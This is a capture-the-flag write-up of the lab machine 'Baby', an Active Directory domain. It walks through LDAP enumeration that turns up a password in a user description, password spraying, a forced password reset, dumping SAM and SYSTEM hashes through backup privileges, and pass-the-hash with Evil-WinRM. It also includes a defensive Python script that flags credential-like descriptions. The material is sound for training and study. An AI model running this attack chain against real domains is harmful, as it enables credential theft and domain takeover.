🐈Baby
Easy machine
Enumeration
Nmap

Ldapsearch

Domain = baby.vl
ldapsearch -H ldap://$IP -x -b "DC=BABY,DC=VL"
I now have a lot of results that can be useful to analyse.
About users (& a password inside the description of a user ⚠️):
dev (group)
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Ian.Walker
it (group)
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell (password: **********)
Caroline.Robinson
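A password sitting in a user's description attribute is exactly what the LDAP enumeration above turned up. As an added defensive example (not part of the original writeup, and not output from baby.vl), the script below parses an LDIF export of the kind ldapsearch produces and flags every account whose description looks like it carries a credential. The LDIF, the account names and the descriptions are all constructed for this example; the keyword list in CRED_PATTERN is an assumption you would tune for your own directory.

```python
import base64
import re

# Constructed sample LDIF, modelled on the shape of an ldapsearch export.
# Accounts and descriptions are invented; the second description is
# folded across two lines (LDIF continuation = leading space) and the
# third is base64-encoded ("description::"), both of which real exports use.
SAMPLE_LDIF = """\
dn: CN=Alice Example,OU=it,DC=example,DC=test
objectClass: user
sAMAccountName: alice.example
description: Helpdesk analyst

dn: CN=Bob Example,OU=it,DC=example,DC=test
objectClass: user
sAMAccountName: bob.example
description: Set initial password to Welcome2024! and force change
  at next logon

dn: CN=Svc Backup,OU=svc,DC=example,DC=test
objectClass: user
sAMAccountName: svc_backup
description:: UHdkOiBCYWNrdXBTM2NyM3Qh
"""

# Words that usually mean a description is carrying a secret.
CRED_PATTERN = re.compile(
    r"\b(password|passwd|pwd|pass|credential|creds?)\b", re.IGNORECASE
)


def parse_ldif(text):
    """Parse LDIF text into a list of {attribute: [values]} dicts.

    Handles folded lines (continuation lines start with one space) and
    base64-encoded values (attribute name followed by '::').
    """
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]  # unfold: drop the folding space only
        else:
            lines.append(raw)

    entries, current = [], {}
    for line in lines + [""]:  # trailing "" flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):  # "attr:: <base64>"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(attr.strip().lower(), []).append(value)
    return entries


def find_credential_descriptions(ldif_text):
    """Return (sAMAccountName, description) pairs whose description
    matches CRED_PATTERN, i.e. accounts to clean up and rotate."""
    hits = []
    for entry in parse_ldif(ldif_text):
        name = entry.get("samaccountname", ["<no sAMAccountName>"])[0]
        for desc in entry.get("description", []):
            if CRED_PATTERN.search(desc):
                hits.append((name, desc))
    return hits


if __name__ == "__main__":
    for name, desc in find_credential_descriptions(SAMPLE_LDIF):
        print(f"{name}: {desc}")
```

Run it against a real export with `ldapsearch ... -o ldif-wrap=no > dump.ldif` and feed the file contents to find_credential_descriptions; anything it returns is a description to scrub and a password to rotate, since every authenticated domain user can read that attribute.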
SMB
Access denied as guest
We will try with our new creds: Teresa.Bell:**********
RPC
Try to enumerate domain users, but I'm getting access denied.
Also tried with my new creds, but not successful.
Kerbrute
After password spraying through all the users, I found the real creds:

Compromised user = Caroline.Robinson@baby.vl:**********
Crackmapexec

We need to change the password before we can log in as this user.
We can use smbpasswd:
smbpasswd.py -newpass 'Makito123!' 'baby.vl'/'Caroline.Robinson':'**********'@"$IP"
We now have: Caroline.Robinson:Makito123!
Domain Enumeration
Doing some domain enumeration with BloodHound & PowerShell


We can confirm that the user Caroline.Robinson can back up files, so we can get the SAM & SYSTEM files to possibly crack or pass the Admin hash.
Hashes
> secretsdump -sam SAM.save -system SYSTEM.save LOCAL
Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b5??????????????????????:8d992faed3??????????????????????:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
But we can do nothing with the Admin hash because it's a local admin, so we can't use this account to connect to the DC.
We also need the ntds.dit.
After following the blog, I can log in with the hash with Evil-WinRM and get the root flag.
PWNED 🏆